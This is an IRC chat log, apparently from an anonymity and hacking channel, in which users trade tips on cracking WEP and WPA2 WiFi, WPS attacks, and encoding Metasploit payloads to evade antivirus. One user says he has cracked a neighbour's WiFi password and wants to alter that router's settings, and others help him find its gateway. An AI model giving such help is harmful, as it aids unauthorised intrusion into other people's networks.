上午12:45:20 - Daamus: I hack wifi with cmd :^)
上午12:45:24 - ethereal: check wigle for wep hotspots lol
上午12:45:30 - jmc: Lulz: tnx bro...
上午12:45:37 - OnionIRC [OnionIRC@localhost] entered the room.
上午12:45:37 - Lulz: root, I think youtube has videos on beef
上午12:45:43 - root: where do we ask for certain courses
上午12:45:48 - Tech-Know: I have no WEP hotspots around here :(
上午12:45:50 - acrid_nerve: wpa2 is vulnerable to weak psk and a good dictionary
上午12:46:01 - Mode +oa for OnionIRC set by ChanServ.
上午12:46:16 - root: yaa i have seen them bt none of them helped me
上午12:46:16 - Lulz: jmc, do you know much perl?
上午12:46:17 - butts: Classes will begin Sunday night (USA time), exact time is to be determined. This will be a basic entry level course covering the topic of anonymity & how to maintain privacy online. Operating systems, encryption, tor/vpn/tunnels, privacy applications & addons, cryptocurrency & more will be covered.
上午12:46:18 - Tech-Know: it's not really "vulnerable", no encryption can save you if you have a shitty key
上午12:46:18 - riki: any website teaching basics of hacking?
上午12:46:19 - riki: lol yeah @Tech-Know
上午12:46:19 - Lulz: weakn3t has some very easy to use tools for cracking wifi jmc
上午12:46:19 - root: why dont you try instech
上午12:46:23 - Sic3fooh has left the room (Quit: leaving).
上午12:46:24 - Lulz: warcarriar
上午12:46:35 * Lulz sucks at spelling
上午12:46:50 - root: riki: it's insectech
上午12:47:04 - Lulz: jmc, https://weaknetlabs.com/warcarrier/
上午12:47:06 - Sic3fooh [onionirc@localhost] entered the room.
上午12:47:06 - Kraully1 [Instantbir@localhost] entered the room.
上午12:47:12 - OnionIRC: bbs
上午12:47:18 - OxED: are there any russians?
上午12:47:40 - Lulz is now known as Boris.
上午12:47:42 - pennyfortheguy: Yeah .. Under the bed
上午12:47:48 - Kraully has left the room (Quit: Ping timeout: 240 seconds).
上午12:47:49 - pennyfortheguy: lol
上午12:47:49 - Kraully1 is now known as Kraully.
上午12:47:49 - ethereal: OxED, see rules of chat
上午12:47:53 - BookElite [BookElite4@localhost] entered the room.
上午12:47:57 - jhon: is it possible to exploit a pc over a different network??/anyone know?
上午12:48:01 - mand has left the room (Quit: ChatZilla 0.9.92 [Firefox 38.7.1/20000101000000]).
上午12:48:02 - acrid_nerve: between reaver and a wps attack and a dictionary attack you can bust i'd say 40-60% of WPA/WPA2 home connections
上午12:48:22 - ethereal: jhon, ofc it is, connecting via direct tunnel or reverse tcp
上午12:48:28 - Boris: acrid_nerve, wps pixie works well
上午12:48:34 - pennyfortheguy: Just Joshin wit ya OxED
上午12:48:43 - root: guys any one could tell me how to get IP of router that would take me to the login page???
上午12:49:00 - jhon: reverse tcp does not ?i dont knw why?
上午12:49:05 - Boris: ifconfig
上午12:49:08 - Boris: ipconfig
上午12:49:10 - OxED: ethereal: known of language is a personal information?
上午12:49:17 - Boris is now known as Lulz.
上午12:49:27 - ethereal: OxED, nationality disclosure is
上午12:49:37 - acrid_nerve: ping domainorloginpage.local
上午12:49:40 - OxED: ok
上午12:49:50 - pennyfortheguy: Good man
上午12:50:06 - acrid_nerve: or do you not know the login page
上午12:50:29 - acrid_nerve: ifconfig (linux) or ipconfig (windows)
上午12:50:34 - pennyfortheguy: Gotta be careful with the "Personal info" OxED
上午12:50:35 - acrid_nerve: look for your gateway
上午12:50:42 - acrid_nerve: it is usually the gateway ip
上午12:50:46 - riki: defualt gatewat@root
上午12:50:47 - Lulz: have you tried 192.168.1.1-192.168.254.254
上午12:50:48 - hunter has left the room (Quit: Leaving).
上午12:50:51 - root: acrid ,  i want to log in into the router
上午12:50:57 - riki: lol
上午12:50:59 - jhon: anyone knows a gud encoder to encode payloads in metasploit?
上午12:51:06 - riki: try 192.168.0.1
上午12:51:11 - ethereal: jhon, veil-evasion
上午12:51:18 - root: default gate way didnot worked
上午12:51:29 - Lulz: google
上午12:51:29 - ScriptKiddie [Instantbir@localhost] entered the room.
上午12:51:39 - jhon: veil-evasion?
上午12:51:39 - riki: holy fuck
上午12:51:42 - acrid_nerve: @root are you on windows or linux
上午12:51:42 - Lulz: "make of router" default gateway
上午12:51:43 - Ulrisch has left the room (Quit: Read error).
上午12:51:44 - BookElite:  192.168.1.1 is usually the default
上午12:51:46 - ethereal: jhon, yes
上午12:51:47 - root: linux
上午12:51:47 - riki: sad @root
上午12:51:56 - root: i'm using kali
上午12:52:03 - Lulz: root, make of the router
上午12:52:07 - ScriptKiddie: Ubuntu
上午12:52:20 - Lulz: belkin,linksys dlink, ect
上午12:52:21 - ethereal: root, are u using it via virtual machine?
上午12:52:23 - riki: just look at the back of ur router....all details are given there!! @root
上午12:52:29 - Leo has left the room (Quit: Leaving).
上午12:52:30 - jhon:  m using shikagata,but after 200 iteration it is nt working??
上午12:52:33 - acrid_nerve: route -nee
上午12:52:36 - root: no i am booting form USB
上午12:52:44 - acrid_nerve: whatever the gateway says i most likely your router
上午12:52:57 - AnonCyberCy [User@localhost] entered the room.
上午12:52:58 - Mode +v for AnonCyberCy set by ChanServ.
上午12:52:59 - Lulz: root, try a cat6 cable
上午12:52:59 - root: riki, i want to log into my negibour's router
上午12:53:05 - ethereal: root, so ifconfig -a and see ut gateway
上午12:53:10 - Lulz: oh ok
上午12:53:14 - root:  i have hacked password now i want o mess the settings of router
上午12:53:37 - pennyfortheguy: Metasploit, payloads can be generated from within the msfconsole. When you ‘use‘ a certain payload, Metasploit adds the ‘generate‘, ‘pry‘ and ‘reload‘ commands.
上午12:53:53 - riki: ohhh....just use social enginnering and go to his house and see the back of router
上午12:53:55 - riki: lol
上午12:54:19 - Sic3fooh has left the room (Quit: leaving).
